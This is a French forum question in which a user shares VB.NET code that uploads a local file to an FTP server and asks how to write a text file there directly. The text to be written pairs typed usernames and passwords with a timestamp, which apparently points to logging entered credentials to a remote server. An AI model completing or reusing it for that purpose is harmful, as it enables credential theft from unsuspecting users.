Création d'un fichier dans un répertoire FTP

superclem100 Messages postés 32 Date d'inscription   Statut Membre Dernière intervention   -  
superclem100 Messages postés 32 Date d'inscription   Statut Membre Dernière intervention   -
Bonjour, je cherche a créer un fichier texte dans un répertoire FTP.
Après avoir fais plusieurs recherches sur internet, je n'ai trouvé seulement le moyen de déplacer un fichier local.

Avant class:

Imports System.IO
Imports System.Net

Dans class:

Dim txt As String
txt = "[" + TimeString + " " + Today + "] " + vbCrLf + "Utilisateur : " + TextBox1.Text + vbCrLf + "Mot de passe : " + TextBox2.Text + vbCrLf + vbCrLf
Try 'Instance d'essaie qui retournera une erreur en cas de problème

Dim request As FtpWebRequest = DirectCast(WebRequest.Create("ftp://LEFTP/fichier.txt"), System.Net.FtpWebRequest) 'On renseigne la futur destination du fichier à envoyer
request.Credentials = New NetworkCredential("ID", "MDP") 'On rentre les identifiant et mot de passe

request.Method = System.Net.WebRequestMethods.Ftp.UploadFile 'On indique qu'on veut upload un fichier

Dim files() As Byte = File.ReadAllBytes("Chemin du fichier a upload") 'On indique le chemin du fichier à upload

Dim strz As Stream = request.GetRequestStream() 'On créer un stream qui va nous permettre d'envoyer le fichier

strz.Write(files, 0, files.Length) 'On envoie le fichier

strz.Close() 'On ferme la connection
strz.Dispose() 'On supprime la connection

Catch ex As Exception 'Une erreur c'est produite, on récupère l'erreur et on l'affiche.
MsgBox("Erreur :" & vbCrLf & ex.ToString)
End Try

ce code fonctionne très bien mais seulement pour déplacer un fichier local vers un répertoire ftp or moi j'aimerais créer un fichier texte directement dans le répertoire.
Merci d'avance
A voir également:

1 réponse

superclem100 Messages postés 32 Date d'inscription   Statut Membre Dernière intervention   13

up
0